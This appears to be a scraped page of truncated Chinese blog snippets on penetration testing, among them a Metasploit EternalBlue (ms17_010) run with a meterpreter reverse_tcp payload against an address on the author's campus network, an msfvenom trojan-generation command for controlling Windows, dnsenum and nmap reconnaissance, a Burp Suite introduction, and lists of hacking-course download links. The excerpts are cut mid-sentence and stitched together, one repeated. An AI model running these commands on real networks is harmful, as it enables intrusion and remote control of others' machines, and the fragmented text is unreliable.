#ms17- use auxiliary/scanner/smb/smb_ms17_010 - exploit use exploit/windows/smb/ms17_010_eternalblue set rhost 10.31.36.66 set payload windows/x64/meterpreter/reverse_tcp set lhost 10.31.30.49 exploit screenshot 信息收集 auxiliary/scanner/discovery/arp_s…

BT51.信息收集2.扫描工具3.漏洞发现4.社会工程学工具5.运用层攻击MSF6.局域网攻击7.密码破解8.维持访问一.DNS信息收集1.Dnsenum/pentest/enumeration/dns/dnsenum#./dnsenum.pl -f dns.txt -dnsserver 8.8.8.8 cisco.com -o cisco.txt-f 指定暴力破解文件-dnsserver 指定dns服务器cisco.com 指定目标域-o cisco.txt 输出到文件 cisco.txt2.…

利用ms17_010的永恒之蓝在前些日子火爆了一段时间,校园网中也声称封锁了相应端口.最近在搞MSF的深入学习,于是有了下文. ms17_010扫描工具 msf中的辅助模块含有一个强大的ms17_010扫描工具: auxiliary/scanner/smb/smb_ms17_010 使用这个工具可以快速扫描某个网段中含有ms17_010漏洞的主机,该工具的使用也很简单. 首先确定要扫描的网段,以我学校的校园局域网为例,要扫描的网段为10.31.0.0/16.实际上经过测试,只需扫描10.31.0…

Burp suite是一款Web安全领域的跨平台工具,基于Java开发.它集成了很多用于发现常见Web漏洞的模块,如Proxy,Spider,Scanner,Intruder,Repeater等.所有的模块共享一个能处理并显示HTTP消息的框架. Proxy 代理模块 这是Burp的核心模块.首先我们要理解一个概念,我们访问一个网站的时候,客户端会向服务器发送请求数据包.在这个过程中,它会先检查是否设置了Proxy代理信息,如果没有的话,数据包就会被发送至服务器.但是如果我们设置了代理服务器,这…

Metasploit用户接口msfconsoleArmitage:  KaliGUI启动:armitage命令启动 Metasploit功能程序msfvenom集成了载荷生成器.载荷编码器.空指令生成器的功能查看详细指令选项:msfvenom-h 服务器消息块协议扫描msf>useauxiliary/scanner/smb/smb_version 搜寻配置不当的MicrosoftSQLServermsf>useauxiliary/scanner/mssql/mssql_ping SSH服务器扫…

来源:HACK学习呀 2015cracer入侵入门到精通视频教程 点我查看 trf3 一笔√带过入侵教程 点我查看 ypan [复仇者]新手入门系列(7套) 点我查看 g1tb 菜鸟入门,做的确实不错 点我查看 q0oh 菜鸟基础(10套) 点我查看 2zq6 小迪渗透第十期 点我查看 u5sv 计算机网络 点我查看 v145 计算机网络视频教程 点我查看 3btd TCP_IP协议基础视频教程 点我查看 ta7z IP地址子网划分终极降解视频讲解(17讲) 点我查看 tfj4 互联网络工程技术…

三、信息收集 被动信息收集 在不接触目标系统时进行的信息收集，包括使用工具Yeti、Whois （1）Whois msf > whois secmaniac.net （2）Netcraft：find the IP address of a server hosting a particular website （3）nslookup 2.主动信息收集：与目标系统主动交互 （1）使用nmap进行端口扫描 推荐选项-sS，执行一次隐秘的TCP扫描 推荐选项-Pn，告诉nmap不要使用ping命令判断…

不多说,直接上干货! 准备工具 1.Kali linux 2016.2(Rolling)系统  IP:  192.168.1.103 2.受害者机子(windows XP系统)   IP: 10.10.10.1.102 3.使用工具 msfconsole 步骤: 1.进入控制台 root@kali:~# msfconsole +-------------------------------------------------------+ | METASPLOIT by Rapid7 | +--…

使用kali下metasploit生成木马,控制windows系统 kali基于debin的数字取证系统,上面集成了很多渗透测试工具,前身为bt r3(BrackTrack) Metasploit,是综合利用工具,使用Ruby开发,使用方便 msfconsole进入工具 MSF,依赖postgresql数据库,在使用MSF前要开启数据库 msfvenom:生成木马msfvenon -p windows/meterpreter/reverse_tcp lhost=kali ip地址 lport=5…

今日偶得大量网盘资源,遂写一博文以分享! 来源:HACK学习呀,微信公众号:HACK学习呀 文件名 链接 提取密码 2015cracer入侵入门到精通视频教程 点我查看 trf3 一笔√带过入侵教程 点我查看 ypan [复仇者]新手入门系列(7套) 点我查看 g1tb 菜鸟入门,做的确实不错 点我查看 q0oh 菜鸟基础(10套) 点我查看 2zq6 小迪渗透第十期 点我查看 u5sv 计算机网络 点我查看 v145 计算机网络视频教程 点我查看 3btd TCP_IP协议基础视频教程 点我查…